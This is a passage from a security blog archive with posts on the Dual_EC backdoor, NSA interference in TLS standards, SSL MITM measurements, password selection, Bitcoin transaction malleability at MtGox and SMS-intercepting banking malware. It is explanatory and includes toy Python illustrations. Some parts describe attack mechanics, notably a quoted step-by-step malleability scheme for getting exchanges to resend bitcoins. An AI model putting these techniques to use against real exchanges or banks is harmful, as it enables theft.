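A minimal sketch of the combination step in Python, assuming each declared text is to hand as a file (the filenames are hypothetical): hash each tome and XOR the digests together, so any single honest contribution randomises the whole seed.

import hashlib
from functools import reduce

def seed_from_texts(paths):
    # Hash each declared text, then XOR all the digests together.
    digests = [hashlib.sha256(open(p, "rb").read()).digest() for p in paths]
    return reduce(lambda a, b: bytes(x ^ y for x, y in zip(a, b)), digests)

# Hypothetical files standing in for the declared tomes:
seed = seed_from_texts(["hamlet.txt", "treasure_island.txt", "cien_anos.txt"])
print(seed.hex())   # feed this into the curve-generation procedure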

Does this work? Does it meet all the requirements? I'm not sure because I haven't had time to think about it. Thoughts?

Posted by iang at 10:19 AM | Comments (1) | TrackBack

May 02, 2014

How many SSL MITMs are there? Here's a number: 0.2% !!!

Whenever we get into the SSL debate, there's always an aspect of glass-half-full or glass-half-empty. Is the SSL system doing the job, and we're safe? Or were we all safe anyway, and it wasn't needed? Or?

Here's a paper that suggests the third choice: that maybe SSL isn't doing the job at all, to a disturbingly high number: 0.2% of connections are MITMed.

Analyzing Forged SSL Certificates in the Wild Huang, Rice, Ellingsen, Jackson https://www.linshunghuang.com/papers/mitm.pdf

Abstract—The SSL man-in-the-middle attack uses forged SSL certificates to intercept encrypted connections between clients and servers. However, due to a lack of reliable indicators, it is still unclear how commonplace these attacks occur in the wild. In this work, we have designed and implemented a method to detect the occurrence of SSL man-in-the-middle attack on a top global website, Facebook. Over 3 million real-world SSL connections to this website were analyzed. Our results indicate that 0.2% of the SSL connections analyzed were tampered with forged SSL certificates, most of them related to antivirus software and corporate-scale content filters. We have also identified some SSL connections intercepted by malware. Limitations of the method and possible defenses to such attacks are also discussed.

Now, that may mean only a few, statistically, but if we think about the dangers of MITMing, it's always been the case that MITMing would only be used under fairly narrow circumstances, because it can in theory be spotted. Therefore this is quite a high number; it means that MITMing is basically quite easy to do.

After eliminating those known causes such as your anti-virus scanning, corporate inspection and so forth, this number drops down by an order of magnitude. But that still leaves some 500-1000 suspicious MITMs spotted in a sample of 3.5m.
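A back-of-envelope check of those numbers in Python (the paper's figures, my arithmetic):

connections = 3_500_000
flagged = connections * 0.002   # 0.2% forged certificates: ~7,000
suspicious = flagged / 10       # an order of magnitude off for AV and corporate boxes
print(int(flagged), int(suspicious))   # 7000 700 -- consistent with 500-1000 suspicious MITMs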

H/t to Jason and Mikko's tweet.

Posted by iang at 06:59 PM | Comments (1) | TrackBack

April 06, 2014

The evil of cryptographic choice (2) -- how your Ps and Qs were mined by the NSA

One of the excuses touted for the Dual_EC debacle was that the magical P & Q numbers that were chosen by secret process were supposed to be defaults. Anyone was at liberty to change them.

Epic fail! It turns out that this might have been just that, a liberty, a hope, a dream. From last week's paper on attacking Dual_EC:

"We implemented each of the attacks against TLS libraries described above to validate that they work as described. Since we do not know the relationship between the NIST- specified points P and Q, we generated our own point Q′ by first generating a random value e ←R {0,1,...,n−1} where n is the order of P, and set Q′ = eP. This gives our trapdoor value d ≡ e−1 (mod n) such that dQ′ = P. (Our random e and its corresponding d are given in the Appendix.) We then modified each of the libraries to use our point Q′ and captured network traces using the libraries. We ran our attacks against these traces to simulate a passive network attacker.

In this new paper, which measures how hard it was to crack open TLS when corrupted by Dual_EC, the authors changed the Qs to match the P delivered, so as to attack the code. Each of the four libraries they had was in binary form, and it appears that each had to be hard-modified in binary in order to mind its own Ps and Qs.
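To make the trapdoor arithmetic concrete, here is a toy demonstration in Python on a deliberately tiny textbook curve (y² = x³ + 2x + 2 over F₁₇, generator (5,1) of order 19) -- nothing like real Dual_EC parameters, purely to show that d·Q′ recovers P when Q′ = e·P and d = e⁻¹ mod n.

p, a = 17, 2   # the toy curve y^2 = x^3 + 2x + 2 over F_17

def ec_add(P, Q):
    # Point addition; None stands for the point at infinity.
    if P is None: return Q
    if Q is None: return P
    (x1, y1), (x2, y2) = P, Q
    if x1 == x2 and (y1 + y2) % p == 0:
        return None
    if P == Q:
        lam = (3 * x1 * x1 + a) * pow(2 * y1, -1, p) % p
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
    x3 = (lam * lam - x1 - x2) % p
    return (x3, (lam * (x1 - x3) - y1) % p)

def ec_mul(k, P):
    # Double-and-add scalar multiplication.
    R = None
    while k:
        if k & 1:
            R = ec_add(R, P)
        P = ec_add(P, P)
        k >>= 1
    return R

P_gen, n = (5, 1), 19    # generator and its prime order on this toy curve
e = 7                    # the standard-writer's secret
Q = ec_mul(e, P_gen)     # the published "nothing up my sleeve" point
d = pow(e, -1, n)        # the trapdoor
print(ec_mul(d, Q) == P_gen)   # True: whoever knows d relates Q back to P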

So did (a) the library implementors forget that issue? or (b) NIST/FIPS in its approval process fail to stress the need for users to mind their Ps and Qs? or (c) the NSA knew all along that this would be a fixed quantity in every library, derived from the standard, which was pre-derived from their exhaustive internal search for a special friendly pair? In other words:

"We would like to stress that anybody who knows the back door for the NIST-specified points can run the same attack on the fielded BSAFE and SChannel implementations without reverse engineering.

Defaults, options, choice of any form have always been known to be bad for users, great for attackers, and a downright nuisance for developers. Here, the libraries did the right thing by eliminating the chance for users to change those numbers. Unfortunately they, NIST and all points thereafter, took the originals without question. Doh!

Posted by iang at 07:32 PM | Comments (0) | TrackBack

April 01, 2014

The IETF's Security Area post-NSA - what is the systemic problem?

In the light of yesterday's newly revealed attack by the NSA on Internet standards, what are the systemic problems here, if any?

I think we can question the way the IETF is approaching security. It has taken a lot of thinking on my part to identify the flaw(s), and not a few rants, with many and aggressive defences and counterattacks from defenders of the faith. Where I am thinking today is this:

First the good news. The IETF's Working Group concept is far better at developing general standards than anything we've seen so far (by this I mean ISO, national committees, industry cartels and whathaveyou). However, it still suffers from two shortfalls.

1. the Working Group system is more or less easily captured by the players with the largest budget. If one views standards as the property of the largest players, then this is not a problem. If OTOH one views the Internet as a shared resource of billions, designed to serve those billions back for their efforts, the WG method is a recipe for disenfranchisement. Perhaps apropos, spotted on the TLS list by Peter Gutmann:

Documenting use cases is an unnecessary distraction from doing actual work. You'll note that our charter does not say "enumerate applications that want to use TLS".

I think reasonable people can debate and disagree on the question of whether the WG model disenfranchises the users, because even though a company can out-manoeuvre the open Internet through sheer persistence and money, we can at least see it happen. In this, the IETF stands in violent sunlight compared to that travesty of mouldy dark closets, CABForum, which shut users out while industry insiders prepared the base documents in secrecy.

I'll take the IETF any day, except when...

2. the Working Group system is less able to defend itself from a byzantine attack. By this I mean the security concept of an attack from someone who doesn't follow the rules, and breaks them in ways meant to break your model and assumptions. We can suspect byzantine disclosures in the fingered ID:

The United States Department of Defense has requested a TLS mode which allows the use of longer public randomness values for use with high security level cipher suites like those specified in Suite B [I-D.rescorla-tls-suiteb]. The rationale for this as stated by DoD is that the public randomness for each side should be at least twice as long as the security level for cryptographic parity, which makes the 224 bits of randomness provided by the current TLS random values insufficient.

Assuming the story as told so far, the US DoD should have added "and our friends at the NSA asked us to do this so they could crack your infected TLS wide open in real time."

Such byzantine behaviour maybe isn't a problem when the industry players are, for example, subject to open observation, as best behaviour can be forced, and honesty at some level is necessary for long-term reputation. But it likely is a problem where the attacker is accustomed to that other world: lies, deception, fraud, extortion or any of a number of other tricks which are the tools of trade of the spies.

Which points directly at the NSA. Spooks being spooks, every spy novel you've ever read will attest to the deception and rule breaking. So where is this a problem? Well, only in the one area they are interested in: security.

Which is irony itself, as security is the field where byzantine behaviour is our meat and drink. Would the Working Group concept pass muster in an IETF security WG? Whether it does or not depends on whether you think it can defend against the byzantine attack. Likely it will pass by fiat because of the loyalty of those involved; I have been one of those WG stalwarts for a period, so I do see the dilemma. But in the cold hard light of day, who is comfortable supporting a WG that is assisted by NSA employees who will apply all available SIGINT and HUMINT capabilities?

Can we agree or disagree on this? Is there room for reasonable debate amongst peers? I refer you now to these words:

On September 5, 2013, the New York Times [18], the Guardian [2] and ProPublica [12] reported the existence of a secret National Security Agency SIGINT Enabling Project with the mission to “actively [engage] the US and foreign IT industries to covertly influence and/or overtly leverage their commercial products’ designs.” The revealed source documents describe a US $250 million/year program designed to “make [systems] exploitable through SIGINT collection” by inserting vulnerabilities, collecting target network data, and influencing policies, standards and specifications for commercial public key technologies. Named targets include protocols for “TLS/SSL, https (e.g. webmail), SSH, encrypted chat, VPNs and encrypted VOIP.”
The documents also make specific reference to a set of pseudorandom number generator (PRNG) algorithms adopted as part of the National Institute of Standards and Technology (NIST) Special Publication 800-90 [17] in 2006, and also standardized as part of ISO 18031 [11]. These standards include an algorithm called the Dual Elliptic Curve Deterministic Random Bit Generator (Dual EC). As a result of these revelations, NIST reopened the public comment period for SP 800-90.

And as previously written here, the NSA has conducted a long-term programme to breach the standards-based crypto of the net.

As evidence of this claim, we now have *two attacks*, being clear attempts to trash the security of TLS and friends, and we have their own admission of intent to breach. In their own words. There is no shortage of circumstantial evidence that NSA people have pushed, steered, nudged the WGs to make bad decisions.

I therefore suggest we have the evidence to take to a jury. Obviously we won't be allowed to do that, so we have to do the next best thing: use our collective wisdom and make the call in the public court of Internet opinion.

My vote is -- guilty.

One single piece of evidence wasn't enough. Two was enough to believe, but alternate explanations sounded plausible to some. But we now have three solid bodies of evidence. Redundancy. Triangulation. Conclusion. Guilty.

Where it leaves us is in difficulties. We can try and avoid all this stuff by e.g., avoiding American crypto, but it is a bit broader than that. Yes, they attacked and broke some elements of American crypto (and you know what I'm expecting to fall next). But they also broke the standards process, and that had even more effect on the world.

It has to be said that the IETF security area is now under a cloud. Not only do they need to analyse things back in time to see where it went wrong, but they also need some concept to stop it happening in the future.

The first step however is to actually see the clouds, and admit that rain might be coming soon. May the security AD live in interesting times, borrow my umbrella?

Posted by iang at 11:56 PM | Comments (0) | TrackBack

March 31, 2014

NSA caught again -- deliberate weakening of TLS revealed!?

In a scandal that is now entertaining that legal term of art "slam-dunk", there is news of a new weakness introduced into the TLS suite by the NSA:

We also discovered evidence of the implementation in the RSA BSAFE products of a non-standard TLS extension called "Extended Random." This extension, co-written at the request of the National Security Agency, allows a client to request longer TLS random nonces from the server, a feature that, if enabled, would speed up the Dual EC attack by a factor of up to 65,000. In addition, the use of this extension allows for attacks on Dual EC instances configured with P-384 and P-521 elliptic curves, something that is not apparently possible in standard TLS.

This extension to TLS was introduced 3 distinct times through the open IETF Internet Draft process, twice by an NSA employee and a well-known TLS specialist, and once by another. The way the extension works is that it increases the quantity of random numbers fed into the cleartext negotiation phase of the protocol. If the attacker has a heads-up on those random numbers, his task of divining the state of the PRNG becomes a lot easier. Indeed, the extension definition states more or less exactly that:

4.1. Threats to TLS

When this extension is in use it increases the amount of data that an attacker can inject into the PRF. This potentially would allow an attacker who had partially compromised the PRF greater scope for influencing the output.

The use of Dual_EC, the previously fingered dodgy standard, makes this possible. Which gives us 2 compromises of the standards process that, when combined, magically work together.

Our analysis strongly suggests that, from an attacker's perspective, backdooring a PRNG should be combined not merely with influencing implementations to use the PRNG but also with influencing other details that secretly improve the exploitability of the PRNG.

Red faces all round.

Posted by iang at 06:12 PM | Comments (0) | TrackBack

March 15, 2014

Update on password management -- how to choose good ones

Spotted in the Cryptogram is something called "the Schneier Method."

So if you want your password to be hard to guess, you should choose something that this process will miss. My advice is to take a sentence and turn it into a password. Something like "This little piggy went to market" might become "tlpWENT2m". That nine-character password won't be in anyone's dictionary. Of course, don't use this one, because I've written about it. Choose your own sentence -- something personal.

Here are some examples:

WIw7,mstmsritt... When I was seven, my sister threw my stuffed rabbit in the toilet.

Wow...doestcst Wow, does that couch smell terrible.

Ltime@go-inag~faaa! Long time ago in a galaxy not far away at all.

uTVM,TPw55:utvm,tpwstillsecure Until this very moment, these passwords were still secure.

You get the idea. Combine a personally memorable sentence with some personally memorable tricks to modify that sentence into a password to create a lengthy password.

This is something which I've also recently taken to using more and more, but I still *write passwords down*.

This isn't a complete solution, as we still have various threats such as losing the paper, forgetting the phrase, or being Miranda'd as we cross the border.

The task here is to evolve to a system where we are reducing our risks, not increasing them. On the whole, we need to improve our password creation ability quite dramatically if password crunching is a threat to us personally, and it seems that it is, as more and more sites fall to the NSA-preferred syndrome of systemic security ineptness.
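For a rough feel of what's at stake, here's a back-of-envelope entropy comparison in Python; the symbol counts are my assumptions, and since mnemonic-derived passwords aren't uniformly random, treat the first figure as an upper bound:

import math

def entropy_bits(alphabet_size, length):
    # Upper bound: assumes every character is chosen uniformly at random.
    return length * math.log2(alphabet_size)

print(entropy_bits(72, 9))   # ~55.5 bits: 9 chars over ~72 mixed symbols, e.g. "tlpWENT2m"
print(entropy_bits(26, 8))   # ~37.6 bits: 8 lowercase letters; a dictionary word
                             # is far weaker still, ~17 bits for a 100,000-word list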

Posted by iang at 08:25 AM | Comments (0) | TrackBack

February 10, 2014

Bitcoin Verification Latency -- MtGox hit by market timing attack, squeezed between the water of impatience and the rock of transactional atomicity

Fresh on the heels of our release of "Bitcoin Verification Latency -- The Achilles Heel for Time Sensitive Transactions", it seems that Mt.Gox has been hit by exactly that -- a market timing attack based on latency. In their own words:

Non-technical Explanation:

A bug in the bitcoin software makes it possible for someone to use the Bitcoin network to alter transaction details to make it seem like a sending of bitcoins to a bitcoin wallet did not occur when in fact it did occur. Since the transaction appears as if it has not proceeded correctly, the bitcoins may be resent. MtGox is working with the Bitcoin core development team and others to mitigate this issue.

Technical Explanation:

Bitcoin transactions are subject to a design issue that has been largely ignored, while known to at least a part of the Bitcoin core developers and mentioned on the BitcoinTalk forums. This defect, known as "transaction malleability" makes it possible for a third party to alter the hash of any freshly issued transaction without invalidating the signature, hence resulting in a similar transaction under a different hash. Of course only one of the two transactions can be validated. However, if the party who altered the transaction is fast enough, for example with a direct connection to different mining pools, or has even a small amount of mining power, it can easily cause the transaction hash alteration to be committed to the blockchain.

The bitcoin api "sendtoaddress" broadly used to send bitcoins to a given bitcoin address will return a transaction hash as a way to track the transaction's insertion in the blockchain.
Most wallet and exchange services will keep a record of this said hash in order to be able to respond to users should they inquire about their transaction. It is likely that these services will assume the transaction was not sent if it doesn't appear in the blockchain with the original hash and have currently no means to recognize the alternative transactions as theirs in an efficient way.

This means that an individual could request bitcoins from an exchange or wallet service, alter the resulting transaction's hash before inclusion in the blockchain, then contact the issuing service while claiming the transaction did not proceed. If the alteration fails, the user can simply send the bitcoins back and try again until successful.

Which all means what? Well, it seems that while waiting on a transaction to pop out of the block chain, one can rely on a token to track it. And so can one's counterparty. Except, this token was not exactly constructed on a security basis, and the initiator of the transaction can break it, leading to two naive views of the transaction. Which leads to some game-playing.

Let's be very clear here. There are three components to this break: Latency, impatience, and a bad token. Latency is the underlying physical problem, also known as the coordination problem or the two-generals problem. At a deeper level, as latency on a network is a physical certainty limited by the speed of light, there is always an open window of opportunity for trouble when two parties are trying to agree on anything.

In fast payment systems, that window isn't a problem for humans (as opposed to algos), as good payment systems clear in less than a second, sometimes known as real time. But not so in Bitcoin, where the latency runs from 5 minutes up to 120, depending on your assumptions, which leaves an unacceptable gap between the completion of the transaction and the users' expectations. Hence the second component: impatience.

The 'solution' to the settlement-impatience problem then is the hash token that substitutes as a final (triple entry) evidentiary receipt until the block-chain settles. This hash or token used in Bitcoin is broken, in that it is not cryptographically reliable as a token identifying the eventual settled payment.
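Here's a toy in Python of why that token was unreliable; the fields and 'signature' strings are fakes of mine, standing in for Bitcoin's real serialization and the encoding quirks that made signatures mutable without becoming invalid.

import hashlib

def txid(tx: dict) -> str:
    # The naive token: a hash over the whole serialized transaction,
    # malleable signature included.
    blob = "|".join(f"{k}={v}" for k, v in sorted(tx.items()))
    return hashlib.sha256(blob.encode()).hexdigest()[:16]

tx = {"from": "exchange-hot-wallet", "to": "customer", "amount": "10 BTC",
      "sig": "3045..original-encoding"}
mutated = dict(tx, sig="3046..re-encoded-but-still-valid")

print(txid(tx))       # the token the exchange recorded
print(txid(mutated))  # a different token for the same economic transaction
# Track the payment by the first token and it appears to vanish -- cue the
# customer's "it never arrived, please resend".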

Obviously, the immediate solution is to fix the hash, which is what Mt.Gox is asking the Bitcoin dev team to do. But this assumes that the solution is in fact a solution. It is not. It's a hack, and a dangerous one. Let's go back to the definition of payments, again assuming the latency of coordination.

A payment is initiated by the controller of an account. That payment is like a cheque (or check) that is sent out. It is then intermediated by the system, which produces the transaction.

But as we all know with cheques, a controller can produce multiple cheques. So a cheque is more like a promise that can be broken. And as we all know with people, relying on the cheque alone isn't reliable enough by and of itself, so the system must resolve the abuses. That fundamental understanding in place, here's what Bitcoin Foundation's Gavin Andresen said about Mt.Gox:

The issues that Mt. Gox has been experiencing are due to an unfortunate interaction between Mt. Gox’s implementation of their highly customized wallet software, their customer support procedures, and their unpreparedness for transaction malleability, a technical detail that allows changes to the way transactions are identified.

Transaction malleability has been known about since 2011. In simplest of terms, it is a small window where transaction ID’s can be “renamed” before being confirmed in the blockchain. This is something that cannot be corrected overnight. Therefore, any company dealing with Bitcoin transactions and have coded their own wallet software should responsibly prepare for this possibility and include in their software a way to validate transaction ID’s. Otherwise, it can result in Bitcoin loss and headache for everyone involved.

Ah. Oops. So it is a known problem. So one could make a case that Mt.Gox should have dealt with it, as a known bug.

But note the language above... Transaction malleability? That is a contradiction in terms. A transaction isn't malleable; the very definition of a transaction is that it is atomic: it is, or it isn't. ACID, for those who recall the CS classes: atomic, consistent, isolated, durable.

Very simply put, that which is put into the beginning of the block chain calculation cycle /is not a transaction/, whereas that which comes out is, assuming a handwavy number of 10-minute cycles, such as 6. Therefore, the identifier of which they speak cannot be a transaction identifier, by definition. It must be an identifier to ... something else!

What's happening here then is more likely a case of cognitive dissonance, leading to a regrettable and unintended deception. Read Mt.Gox's description above again, and the reliance on the word becomes clearer. Users have come to demand transactions because we techies taught them that transactions are reliable, by definition; Bitcoin provides the word but not the act.

So the first part of the fix is to change the words back to ones with reliable meanings. You can't simply undefine a term that has been known for 40 years, and expect the user community to follow.

(To be clear, I'm not suggesting what the terms should be. In my work, I simply call what goes in a 'Payment', and what comes out a 'Receipt'. The latter Receipt is equated to the transaction, and in my lesson on triple entry, I often end with a flourish: The Receipt is the Transaction. Which has more poetry if you've experienced transactional pain before, and you've read the whole thing. We all have our dreams :)

That still leaves us with the impatience problem.

Note that this will also affect any other crypto-currency using the same transaction scheme as Bitcoin.

Conclusion
To put things in perspective, it's important to remember that Bitcoin is a very new technology and still very much in its early stages. What MtGox and the Bitcoin community have experienced in the past year has been an incredible and exciting challenge, and there is still much to do to further improve.

When we did our early work in this, we recognised that the market timing attack comes from the implicit misunderstanding of how latency interferes with transactions, and how impatience interferes with both of them. So in our protocols, there is no 'token' that is available to track a pending transaction. This was a deliberate, early design decision, and indeed the servers still just dump and ignore anything they don't understand in order to force the clients away from leaning on unreliable crutches.

It's also the flip side of the triple-entry receipt -- its existence is the full evidence; hence, the receipt is the transaction. Once you have the receipt you're golden; if not, you're in the mud.

But Bitcoin had a rather extraordinary problem -- the distribution of its consensus on the transaction amongst any large group of nodes that wanted to play. Which inherently made transactional mechanics and latency issues blow out. This is a high price to pay, and only history is going to tell us whether the price is too high or affordable.

Posted by iang at 07:36 AM | Comments (1) | TrackBack

December 30, 2013

MITMs conducted by the NSA - 50% success rate

One of the complaints against the SSL obesity security model was that all the blabber of x.509/CAs was there to protect against the MITM (man-in-the-middle) attack. But where was this elusive beast?

Now we have evidence. In the recent Der Spiegel article about the NSA's hacking catalogue, it is laid out pretty comprehensively:

A Race Between Servers

Once TAO teams have gathered sufficient data on their targets' habits, they can shift into attack mode, programming the QUANTUM systems to perform this work in a largely automated way. If a data packet featuring the email address or cookie of a target passes through a cable or router monitored by the NSA, the system sounds the alarm. It determines what website the target person is trying to access and then activates one of the intelligence service's covert servers, known by the codename FOXACID.

This NSA server coerces the user into connecting to NSA covert systems rather than the intended sites. In the case of Belgacom engineers, instead of reaching the LinkedIn page they were actually trying to visit, they were also directed to FOXACID servers housed on NSA networks. Undetected by the user, the manipulated page transferred malware already custom tailored to match security holes on the target person's computer.

The technique can literally be a race between servers, one that is described in internal intelligence agency jargon with phrases like: "Wait for client to initiate new connection," "Shoot!" and "Hope to beat server-to-client response." Like any competition, at times the covert network's surveillance tools are "too slow to win the race." Often enough, though, they are effective. Implants with QUANTUMINSERT, especially when used in conjunction with LinkedIn, now have a success rate of over 50 percent, according to one internal document.

We've seen some indication that wireless is used for MITMs, but it is a difficult attack, as it requires physical presence. Phishing is an MITM, and has been in widespread use, but like the apocryphal saying from Star Wars, these MITMs "aren't the droids you're looking for." Or so say the security experts behind web encryption standards.

This one is the droid we're looking for. A major victim is identified, serious assets are listed, secondary victims, procedures, codenames, the whole works. This is an automated, industrial-scale attack, something that breaches the normal conceptual boundaries of what an MITM looks like. We can no longer assume that MITMs are too expensive for mass use. Their economic applicability is presumably enabled by the shadow network the NSA operates, capable of attacking the nodes in ours:

The insert method and other variants of QUANTUM are closely linked to a shadow network operated by the NSA alongside the Internet, with its own, well-hidden infrastructure comprised of "covert" routers and servers. It appears the NSA also incorporates routers and servers from non-NSA networks into its covert network by infecting these networks with "implants" that then allow the government hackers to control the computers remotely.

Tantalising stuff for your inner geek! So it seems we now do need protection against the MITM, in the form of the NSA. For real work, and also for Facebook, LinkedIn and other entertainment sites, because of their universality as an attack vector. But will SSL provide that? In the short term and for the easier cases, yes. But not completely, because most set-ups are ill-equipped to deal with attacks at an aggressive level. Until the browser starts mapping the cert to the identity expected, something we've been requesting for a decade now, it just won't provide much defence.

Certificate pinning is coming, but so is Christmas, DNSSec, IPv6 and my guaranteed anti-unicorn pill. By the time certificate pinning gets here, the NSA will likely have exfiltrated every important site's keys or bought off the right CA so it doesn't matter anyway.

One question remains: is this a risk? to us?

In the old Security World, we always said we don't consider the NSA a risk to us, because they never reveal the data (unless we're terrorists or drug dealers or commies or Iranians, in which case we know we're fair game).

That no longer holds true. The NSA shares data with every major agency in the USA that has an interest. They crossed the line that cannot be crossed, and the rot of money-laundering seizure corruption, economic espionage and competitive intervention means that the NSA is now as much a threat to everyone as any other attacker.

Every business that has a competitor in the USA. Every department that has a negotiation with a federal agency. Every individual that has ever criticised the status quo on the Internet. We're all at risk now.

Oh, to live in interesting times.

Posted by iang at 01:39 AM | Comments (0) | TrackBack

December 24, 2013

MITB defences of dual channel -- the end of a good run?

Back in 2006 Philipp Gühring penned the story of what had been discovered in European banks, in what has now become a landmark paper in banking security:

A new threat is emerging that attacks browsers by means of trojan horses. The new breed of new trojan horses can modify the transactions on-the-fly, as they are formed in browsers, and still display the user's intended transaction to her. Structurally they are a man-in-the-middle attack between the user and the security mechanisms of the browser. Distinct from Phishing attacks which rely upon similar but fraudulent websites, these new attacks cannot be detected by the user at all, as they use real services, the user is correctly logged-in as normal, and there is no difference to be seen.

This was quite scary. The European banks had successfully migrated their user bases across to the online platform and were well on the way to reducing branch numbers. Fantastic cost reductions... But:

The WYSIWYG concept of the browser is successfully broken. No advanced authentication method (PIN, TAN, iTAN, Client certificates, Secure-ID, SmartCards, Class3 Readers, OTP, ...) can defend against these attacks, because the attacks are working on the transaction level, not on the authentication level. PKI and other security measures are simply bypassed, and are therefore rendered obsolete.

If they saw any reduction in use of web banking, and the load shift back to branch, they were in a world of pain --- capacity had shrunk.

The conclusion that the European banks came to, once they'd got over their initial fears, was that phones could be used to do SMS transaction authorisations. This system was rolled out over the next couple of years, and it more or less took the edge off the MITB.

Now comes news from NSS Labs' Ken Baylor that the malware authors have developed two-channel attacks:

On the positive side, there has been little innovation in the functionality of mobile financial malware in the last 24 months, and the iOS platform appears secure; however, further analysis reveals that there are now multiple mobile malware suites capable of defeating bank multifactor authentication. With 99 percent of new mobile malware targeting Android, attacks on this platform are unprecedented both in their number and their impact. The lack of iOS malware is likely related to the low availability of iOS malware developers in the ex-Soviet Republic.

While banks remain slow to evolve their mobile security strategies, they will find the cyber criminals are several steps ahead of them.

Malware now tries to mount an attack on both channels. This occurs thusly:

Zeus and other MITB trojans have used social engineering to bypass this process. When a user on an infected PC authenticates to a banking site using SMS authentication, the user is greeted by a webinject, similar to Figure 1. The webinject requires the installation of new software on the user’s mobile device; this software is in fact malware.

ZitMo malware intercepts SMS TANs from the bank. Once greeted by the webinject on a Zeus-infected PC, the user enrolls by entering a phone number. A “security update” link is sent to the phone, and ZitMo installs when the link is clicked. Any bank SMS messages are redirected to a cyber criminal’s phone (all other SMS messages will be delivered as normal).

We knew at the time that this could occur, but it seemed unlikely. (I say 'we' to mean that I was mostly an observer; at the time I was in Vienna and was at the periphery of some of these groups. However, my lack of German made any contributions rather erratic.)

Unlikely because, on the one hand, it seemed an inordinate amount of complexity, and on the other, there wasn't enough of a target. What changed? The market has shifted hugely over to mobile use as opposed to web use. The Americans have been a bit slower, but now they're on a roll:

According to the Pew Research Center, mobile banking usage has jumped from 24 percent of the US adult population in April 2012 to 35 percent in May 2013. Banks have encouraged this move toward mobile banking. Most banks began offering mobile services with a simple redirect to a mobile site (with limited functionality) upon detection of smartphone HTTP headers; others created mobile apps with HTML wrappers for a better user experience and more functionality. As yet, only a few have built secure native apps for each platform.

Many banks believe that mobile devices are a secure secondary method of authentication. To authenticate the widest number of people who have phones (rather than just smartphones), many built their second factor authentication solutions on one of the most widely available (although insecure) protocols: short message services (SMS). As banks believed an SMS-authenticated customer was more secure than a PC-based user, they enabled the former to carry out riskier transactions. Realizing the rewards awaiting those able to circumvent SMS authentication, criminals quickly developed mobile malware.

So the convenient second channel of the phone has actually switched places: it's the primary channel, it's life, and the laptop is relegated to the at-office, at-home work slave. The model has been turned upside down, and in the things that fell out of the pockets, the security also took a tumble.

Closing with Ken Baylor's recommendations:

NSS Labs Recommendations
  • Understand and account for current mobile malware strategies when developing mobile banking apps.
  • Do not rely on SMS-based authentication; it has been thoroughly compromised.
  • Retire HTML wrapper mobile banking apps and replace them with secure native mobile apps where feasible. These apps should include a combination of hardened browsers, certificate-based identification, unique install keys, in-app encryption, geolocation, and device fingerprinting.


Hey! I guess that's the business I'm in now. We've successfully ported the 'mature' Ricardo platform to Android: no flaky browsers in sight, and our auth strategy is a real strategy, not that old certificate-based snake-oil. Obviously, public keys and in-app encryption.

Geolocation and device fingerprinting I have yet to add. But that's easy enough later on. I guess I should post on all this some time, if anyone is interested...

Posted by iang at 03:40 AM | Comments (1) | TrackBack

November 10, 2013

The NSA will shape the worldwide commercial cryptography market to make it more tractable to...

In the long-running saga of the Snowden revelations, another fact is confirmed by Ashkan Soltani. It's the last point on this slide, showing some nice redaction minimisation.

In words:

(U) The CCP expects this Project to accomplish the following in FY 2013:
  • ...
  • (TS//SI//NF) Shape the worldwide commercial cryptography marketplace to make it more tractable to advanced cryptanalytic capabilities being developed by NSA/CSS. [CCP_00090]

Confirmed: the NSA manipulates the commercial providers of cryptography to make it easier to crack their products. When I said avoid American-influenced cryptography, I wasn't joking: the Consolidated Cryptologic Program (CCP) is consolidating access to your crypto.

Addition: John Young forwarded me the original documents (Guardian and NYT) and their blanket introduction makes it entirely clear:

(TS//SI//NF) The SIGINT Enabling Project actively engages the US and foreign IT industries to covertly influence and/or overtly leverage their commercial products' designs. These design changes make the systems in question exploitable through SIGINT collection (e.g., Endpoint, MidPoint, etc.) with foreknowledge of the modification. ....

Note also that the classification for the goal above differs in that it is NF -- No Foreigners -- whereas most of the other goals listed are REL TO USA, FVEY which means the goals can be shared with the Five Eyes Intelligence Community (USA, UK, Canada, Australia, New Zealand).

The more secret it is, the more important the goal, clearly. The only other goal with this level of secrecy was the one suggesting an actual target of sensitivity -- fair enough. More confirmation:

(U) Base resources in this project are used to:
  • (TS//SI//REL TO USA, FVEY) Insert vulnerabilities into commercial encryption systems, IT systems, networks and endpoint communications devices used by targets.
  • ...

and in goals 4, 5:

  • (TS//SI//REL TO USA, FVEY) Complete enabling for [XXXXXX] encryption chips used in Virtual Private Network and Web encryption devices. [CCP_00009].
  • (TS//SI//REL TO USA, FVEY) Make gains in enabling decryption and Computer Network Exploitation (CNE) access to fourth generation/Long Term Evolution (4GL/LTE) networks via enabling. [CCP_00009]

Obviously, we're interested in the [XXXXXX] above. But the big picture is complete: the NSA wants backdoor access to every chip used for encryption in VPNs, wireless routers and the cell network.

This is no small thing. There should be no doubt now that the NSA actively looks to seek backdoors in any interesting cryptographic tool. Therefore, the NSA is numbered amongst the threats, and so are your cryptographic providers, if they are within reach of the NSA.

Granted that other countries might behave the same way. But the NSA has the resources, the will, the market domination (consider Microsoft's CAPI, Java's Cryptography Engine, Cisco & Juniper on routing, FIPS effect on SSL, etc) and now the track record to make this a more serious threat.

Posted by iang at 06:48 AM | Comments (0) | TrackBack

November 01, 2013

NSA v. the geeks v. google -- a picture is worth a thousand cribs

Dave Cohen says: "I wonder if I have what it takes to make presentations at the NSA."

H/t to Jeroen. So I wonder if the Second World Cryptowars are really on?

Our Mission

To bring the world our unique end-to-end encrypted protocol and architecture that is the 'next-generation' of private and secure email. As founding partners of The Dark Mail Alliance, both Silent Circle and Lavabit will work to bring other members into the alliance, assist them in implementing the new protocol and jointly work to proliferate the world's first end-to-end encrypted 'Email 3.0' throughout the world's email providers. Our goal is to open source the protocol and architecture and help others implement this new technology to address privacy concerns against surveillance and back door threats of any kind.

Could be. In the context of the new google sniffing revelations, it may now be clearer how the NSA is accessing all of the data of all of the majors. What do we think about the NSA? Some aren't happy, like Kenton Varda:

If the NSA is indeed tapping communications from Google's inter-datacenter links then they are almost certainly using the open source protobuf release (i.e. my code) to help interpret the data (since it's almost all in protobuf format). Fuck you, NSA.

What about google? Some outrage from the same source:

I had to admit I was shocked by one thing: I'm amazed Google is transmitting unencrypted data between datacenters.

is met with Varda's comment:

We're (I think) talking about Google-owned fiber between Google-owned endpoints, not shared with anyone, and definitely not the public internet. Physically tapping fiber without being detected is pretty difficult and a well-funded state-sponsored entity is probably the only one that could do it.

Ah. So google did some risk analysis and thought this was one they could pass on. Google's bad. A bit of research turns up a BlackHat presentation from 2003:

